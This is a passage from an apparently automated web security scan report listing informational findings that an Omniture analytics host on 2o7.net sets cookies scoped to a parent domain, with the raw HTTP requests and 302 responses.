Set-Cookie: s_vi_twiwuhc=[CS]v4|0-0|4DC2820C[CE]; Expires=Tue, 3 May 2016 10:55:08 GMT; Domain=.2o7.net; Path=/
Location: http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s44325433499179?AQB=1&pccr=true&g=none&AQE=1
X-C: ms-4.4.1
Expires: Wed, 04 May 2011 10:55:08 GMT
Last-Modified: Fri, 06 May 2011 10:55:08 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www65
Content-Length: 0
Content-Type: text/plain
Connection: close


16.124. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s44696885943412

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sportingnews.122.2o7.net
Path:   /b/ss/spnprod/1/H.15.1/s44696885943412

Issue detail

The application issued a cookie that is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/spnprod/1/H.15.1/s44696885943412 HTTP/1.1
Host: sportingnews.122.2o7.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vi_kbuchzx7Ex60bodah=[CS]v4|26D5B4CB05010768-40000100203F0C39|4DAB6981[CE]; s_vi_badex60xxcbdimh=[CS]v4|26DF53F605010C64-40000105C005564E|4DBEA7E9[CE]; s_vi_kjodgjid=[CS]v4|26DB88E0051623F8-40000183606A19F8|4DB711BC[CE]; s_vi=[CS]v1|26E0FB02851D1EE9-40000107601F9114[CE]; s_vi_zhgmzyx7Bfm=[CS]v4|26DCD88E051D2876-40000126E0042316|4DB9B141[CE]; s_vi_bpx7Fubaxxx7Cbx7Dtdcacx7Eu=[CS]v4|26DCD8A2051D2CE1-4000010B601E36D8|4DB9B141[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26DA3EC40516221C-6000018240050B58|4DB47D87[CE]; s_vi_efmdyx7Fx7Cdyx7Fc=[CS]v4|26D9C884851603AF-6000017820228B75|4DB39107[CE]; s_vi_kaquvg=[CS]v4|26D9C88705163068-600001A62005EACD|4DB3910D[CE]; s_vi_ftx7Bqfcx7Cqpzflx7Bqx7Cvtax7Czx7B=[CS]v4|26DCD8AD051D2DB9-6000010BE00A41AE|4DB9B152[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26DA3EC40516221C-6000018240050B56|4DB47D87[CE];

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:55:08 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_twiwuhc=[CS]v4|0-0|4DC2820C[CE]; Expires=Tue, 3 May 2016 10:55:08 GMT; Domain=.2o7.net; Path=/
Location: http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s44696885943412?AQB=1&pccr=true&g=none&AQE=1
X-C: ms-4.4.1
Expires: Wed, 04 May 2011 10:55:08 GMT
Last-Modified: Fri, 06 May 2011 10:55:08 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www277
Content-Length: 0
Content-Type: text/plain
Connection: close


16.125. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s44929469036869

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sportingnews.122.2o7.net
Path:   /b/ss/spnprod/1/H.15.1/s44929469036869

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

s_vi_twiwuhc=[CS]v4|0-0|4DC2820C[CE]; Expires=Tue, 3 May 2016 10:55:08 GMT; Domain=.2o7.net; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/spnprod/1/H.15.1/s44929469036869 HTTP/1.1
Host: sportingnews.122.2o7.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vi_kbuchzx7Ex60bodah=[CS]v4|26D5B4CB05010768-40000100203F0C39|4DAB6981[CE]; s_vi_badex60xxcbdimh=[CS]v4|26DF53F605010C64-40000105C005564E|4DBEA7E9[CE]; s_vi_kjodgjid=[CS]v4|26DB88E0051623F8-40000183606A19F8|4DB711BC[CE]; s_vi=[CS]v1|26E0FB02851D1EE9-40000107601F9114[CE]; s_vi_zhgmzyx7Bfm=[CS]v4|26DCD88E051D2876-40000126E0042316|4DB9B141[CE]; s_vi_bpx7Fubaxxx7Cbx7Dtdcacx7Eu=[CS]v4|26DCD8A2051D2CE1-4000010B601E36D8|4DB9B141[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26DA3EC40516221C-6000018240050B58|4DB47D87[CE]; s_vi_efmdyx7Fx7Cdyx7Fc=[CS]v4|26D9C884851603AF-6000017820228B75|4DB39107[CE]; s_vi_kaquvg=[CS]v4|26D9C88705163068-600001A62005EACD|4DB3910D[CE]; s_vi_ftx7Bqfcx7Cqpzflx7Bqx7Cvtax7Czx7B=[CS]v4|26DCD8AD051D2DB9-6000010BE00A41AE|4DB9B152[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26DA3EC40516221C-6000018240050B56|4DB47D87[CE];

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:55:08 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_twiwuhc=[CS]v4|0-0|4DC2820C[CE]; Expires=Tue, 3 May 2016 10:55:08 GMT; Domain=.2o7.net; Path=/
Location: http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s44929469036869?AQB=1&pccr=true&g=none&AQE=1
X-C: ms-4.4.1
Expires: Wed, 04 May 2011 10:55:08 GMT
Last-Modified: Fri, 06 May 2011 10:55:08 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www69
Content-Length: 0
Content-Type: text/plain
Connection: close


16.126. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s45011387388221

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sportingnews.122.2o7.net
Path:   /b/ss/spnprod/1/H.15.1/s45011387388221

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

s_vi_twiwuhc=[CS]v4|0-0|4DC2820C[CE]; Expires=Tue, 3 May 2016 10:55:08 GMT; Domain=.2o7.net; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/spnprod/1/H.15.1/s45011387388221 HTTP/1.1
Host: sportingnews.122.2o7.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vi_kbuchzx7Ex60bodah=[CS]v4|26D5B4CB05010768-40000100203F0C39|4DAB6981[CE]; s_vi_badex60xxcbdimh=[CS]v4|26DF53F605010C64-40000105C005564E|4DBEA7E9[CE]; s_vi_kjodgjid=[CS]v4|26DB88E0051623F8-40000183606A19F8|4DB711BC[CE]; s_vi=[CS]v1|26E0FB02851D1EE9-40000107601F9114[CE]; s_vi_zhgmzyx7Bfm=[CS]v4|26DCD88E051D2876-40000126E0042316|4DB9B141[CE]; s_vi_bpx7Fubaxxx7Cbx7Dtdcacx7Eu=[CS]v4|26DCD8A2051D2CE1-4000010B601E36D8|4DB9B141[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26DA3EC40516221C-6000018240050B58|4DB47D87[CE]; s_vi_efmdyx7Fx7Cdyx7Fc=[CS]v4|26D9C884851603AF-6000017820228B75|4DB39107[CE]; s_vi_kaquvg=[CS]v4|26D9C88705163068-600001A62005EACD|4DB3910D[CE]; s_vi_ftx7Bqfcx7Cqpzflx7Bqx7Cvtax7Czx7B=[CS]v4|26DCD8AD051D2DB9-6000010BE00A41AE|4DB9B152[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26DA3EC40516221C-6000018240050B56|4DB47D87[CE];

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:55:08 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_twiwuhc=[CS]v4|0-0|4DC2820C[CE]; Expires=Tue, 3 May 2016 10:55:08 GMT; Domain=.2o7.net; Path=/
Location: http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s45011387388221?AQB=1&pccr=true&g=none&AQE=1
X-C: ms-4.4.1
Expires: Wed, 04 May 2011 10:55:08 GMT
Last-Modified: Fri, 06 May 2011 10:55:08 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www262
Content-Length: 0
Content-Type: text/plain
Connection: close


16.127. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s45177161318715

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sportingnews.122.2o7.net
Path:   /b/ss/spnprod/1/H.15.1/s45177161318715

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/spnprod/1/H.15.1/s45177161318715 HTTP/1.1
Host: sportingnews.122.2o7.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vi_kbuchzx7Ex60bodah=[CS]v4|26D5B4CB05010768-40000100203F0C39|4DAB6981[CE]; s_vi_badex60xxcbdimh=[CS]v4|26DF53F605010C64-40000105C005564E|4DBEA7E9[CE]; s_vi_kjodgjid=[CS]v4|26DB88E0051623F8-40000183606A19F8|4DB711BC[CE]; s_vi=[CS]v1|26E0FB02851D1EE9-40000107601F9114[CE]; s_vi_zhgmzyx7Bfm=[CS]v4|26DCD88E051D2876-400001